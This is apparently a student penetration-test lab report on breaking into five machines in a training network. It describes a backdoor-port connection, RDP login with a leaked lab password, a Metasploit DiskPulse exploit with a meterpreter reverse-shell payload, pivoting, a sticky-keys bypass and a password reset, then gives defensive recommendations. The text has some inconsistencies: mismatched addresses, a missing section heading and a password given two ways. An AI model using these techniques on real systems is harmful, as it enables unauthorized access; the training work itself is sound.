Beruflich Dokumente
Kultur Dokumente
Summary ......................................................................................................................................... 2
Exploitation ..................................................................................................................................... 6
Box #1 ......................................................................................................................................... 6
Box #2 ......................................................................................................................................... 7
Box #3 ......................................................................................................................................... 9
Box #4 ....................................................................................................................................... 11
Box #5 ....................................................................................................................................... 13
Recommendation .......................................................................................................................... 15
Reference ...................................................................................................................................... 17
Summary
The lab shows the process of performing a penetration test by showing the vulnerability of five
machine and how each will be compromised. There are five target that will be hacked into by
the team and the report will show details progress of how each machine is being compromised
and the different method that was used in the lab. There will be three phrases that happen, the
first one if information gathering to figured out who the target were on the network. Port Scan
will be run to test for targets that had open ports, which made them vulnerable and easy to attack.
Use port scan result to figured out the approach of each system and use it to attack the machines
Information Gathering
1. 10.113.113.1
2. 10.113.113.10
3. 10.113.113.15
4. 10.113.113.20
5. 10.113.113.50
6. 10.113.113.51
7. 10.113.113.100
8. 10.113.113.101
9. 10.113.113.102
10. 10.113.113.103
11. 10.113.113.105
12. 10.113.113.108
13. 10.113.113.109
14. 10.113.113.110
15. 10.113.113.112
16. 10.113.113.113
17. 10.113.113.114
18. 10.113.113.115
19. 10.113.113.116
The above is the list of all machine that run on the network 10.113.113.1. There are five possible
targets that has open ports and vulnerability that could be attacked, which has been highlighted in
red for further action. The port scan result show that there are five machine that has open ports,
which made them vulnerable at some degree and could be attack. It allows us to know exactly
Box #1
Address: 10.113.113.15
I use telnet to connect to 10.113.113.10 through port 1337 because telnet is unknown port listed
in the nmap scan. There is a backdoor port 1337 so netcat could also be used to get access to
host 10.113.113.10 system. Once I am inside of the console I browse through the C:\ drive of the
machine and found a text file that gives hint on how to get to the next target.
Box #2
Address: 10.113.113.15
After looking through the website source of host 10.113.113.15, it seems that the user has save
the username and password to their workstation login in the html. Since port 3389 are open on
this machine RDP could be using to remotely connect to the machine and uses the login
credential found on the 10.113.113.15 websites sources to get access to the machine. Enter
rdesktop 10.113.113.15 to get to the login screen of box 2 and input admin for the user name
and Th1sIS@SecureP@ssw0rd for the password and you will get access to the machine. A
text file was found on the desktop let us know the extra step that we need to take to get to the
next box.
Box #3
Address: 10.113.113.20
use the last hint and go to ExploitDB and look for DiskPulse_Enterprise_9.9.16_GETBufer and
download the exploit to the system. We then Add it to the msfconsole and use it to exploit host
msfconsole and set the target and listening address to the console. Use Set RHOST to set the
target address, which is 10.113.113.20 and show options can be used to see whether it has been
added. Use Set Payload windows/meterpreter/reverse_tcp to set the listening addresses, which
is your address by using set LHOST. Exploit the box successfully will bring you to the
meterpreter and it can be used to get to the system by simply enter shell. That will bring you
to the machine and command such as sysinfo will give information on the machine.
Get system information by typing sysinfo to get more information on the system.
Box #4
Address: 10.113.113.50
The plan is to used box 3 meterpreter and portfwd to exploit box 4 by setting up a pivot point.
After looking through the web sources of host 10.113.113.50 and there is a unique string appear
to be base64 encoded. We use duckduckgo search engine to search for the string and get the
result on the bottom, which confirm that the unique string is in fact base64 encoded. I use box
#3 to establish a pivot between my box and 10.113.113.20 as a pivot point to attack box 4. I then
decoded the encoded string found in the website sources and used it as the login password to the
server. I then remotely connected to the server through port 3389 by using command rdesktop
10.113.113.50 and uses the login credential to log in. The user name for the server is
administrator and the password it the decoded string of the encoded string found on the
Address: 10.113.113.51
The port scan result show that port 3389 RDP is open, therefore we can remotely connect to it
similar to box #3. We then tab the shift key 5 times using the sticky key on windows 10 to get to
the command prompt. net user were using to list the account on this machine and the default
account for the machine is under oldchap, which mean that the admin account is oldchap. Use
net user to reset the password for old chap by simple enter net user oldchap 12346 and the
password for oldchap were reset to 123456. Use the login credential to get access to the machine
I would have recommended that the company check and remove any backdoor that was open.
For example, box #1 one had a backdoor open on port 1337 where I can use nc or telnet to easily
walkthrough easily. For box #2, it is not wisely a good idea to put your credential information to
your admin account on a system with RDP port 3389 open, because I can remotely connect to the
machine and used the credential information to log into your account. Box number three is the
most secure compare to the last box, however, with DiskPulse_Enterprise_9.9.16 installed on it
make it vulnerable since there is an exploit that was create specifically to exploits the machines
in the exploitDB open sources. I was able to easily exploit the box with port 80 open by using an
external exploit downloaded from the exploitDB website. I then setup a pivot point between box
#3 and my machine to attack box #4 and the credential information could be found base64
encoded in the website sources. I was able to decode the string and used it to log into the server
of box #4. Box #5 could easily be login by changing the credential information through
command prompt by using the sticky key option to open it, which make it vulnerable. The best
way is to disable any option of sticky key from the login screen and make sure that people will
not be able to have access to the command prompt without logging into the machine.
Reference
Metasploit. (2017, September 21). Disk Pulse Enterprise 9.9.16 - GET Buffer Overflow
db.com/exploits/42767/